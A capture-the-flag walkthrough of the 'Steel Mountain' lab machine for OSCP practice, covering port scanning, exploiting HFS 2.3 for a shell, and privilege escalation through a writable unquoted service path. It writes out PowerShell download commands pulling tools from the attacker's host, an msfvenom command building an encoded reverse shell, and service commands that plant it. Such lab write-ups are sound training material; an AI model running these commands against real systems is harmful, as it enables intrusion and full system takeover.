Steel Mountain Walkthrough - OSCP Preparation


As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap

80/tcp    open  http               Microsoft IIS httpd 8.5                                                                                                 
| http-methods:                                                                                                                                            
|_  Potentially risky methods: TRACE                                                                                                                       
|_http-server-header: Microsoft-IIS/8.5                                                                                                                    
|_http-title: Site doesn't have a title (text/html).                                                                                                       

135/tcp   open  msrpc              Microsoft Windows RPC                                                                                                   
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                           
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                                    

3389/tcp  open  ssl/ms-wbt-server?                                                                                                                         
| rdp-ntlm-info:                                                                                                                                           
|   Target_Name: STEELMOUNTAIN                                                                                                                             
|   NetBIOS_Domain_Name: STEELMOUNTAIN                                                                                                                     
|   NetBIOS_Computer_Name: STEELMOUNTAIN                                                                                                                   
|   DNS_Domain_Name: steelmountain                                                                                                                         
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2020-04-23T03:09:55+00:00
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2020-04-22T02:48:20
|_Not valid after:  2020-10-22T02:48:20
|_ssl-date: 2020-04-23T03:10:02+00:00; 0s from scanner time.

8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49161/tcp open  msrpc              Microsoft Windows RPC

Enumerating Port 80

If we browser URL:80 we get an index.html file.


gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u -s '200,301,403' 2>/dev/null

We couldn’t find anything.

Enumerating Port 8080

After browsing IP:8080 we already found the version of HTTP File Server, from ‘Server Information’ section.


As we searched for exploits related to HFS 2.3 version we could find many exploits.

searchsploit -m exploits/windows/remote/ .

We copied exploit to our working directory to modify it for our needs.

After placing our IP address inside exploit we’re ready to go!

And we got the low privileged shell!

User.txt flag can be found inside C:\Users\bill\Desktop\users.txt

Privilege Escalation


To get started with privilege escalation we’re gonna run PowerUp.ps1 script.

We’ve loaded PowerShell module through Metasploit to upload PowerUp.ps1 script.

load powershell

To run PowerUp.ps1

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

There are several unquoted path services available but that does not mean we have permission to edit or write in them. That is where accesschk.exe comes in handy.


accesschk.exe reveals ‘bill’ has write access to " C:\Program Files (x86)\IObit* ". If we modify the next PATH that the service checks for the executable related to AdvancedSystemCareService9, we can trick the service to run something else, such as a reverse shell.

powershell.exe -exec bypass -Command (New-Object System.Net.WebClient).DownloadFile('', 'C:\Users\bill\Desktop\accesschk.exe')

accesschk.exe /accepteula -ucqv AdvancedSystemCareService9

accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\"

accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\IObit\"

Create a reverse shell named ASCService.exe

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -e x86/shikata_ga_nai -f exe -o ASCService.exe

Upload ASCService.exe reverse shell

powershell.exe -exec bypass -Command (New-Object System.Net.WebClient).DownloadFile('', 'C:\Users\bill\Desktop\ASCService.exe')

Before, executing our payload we’re gonna have to stop the service and start again in order to get reverse shell.

sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

sc start AdvancedSystemCareService9

And we got root!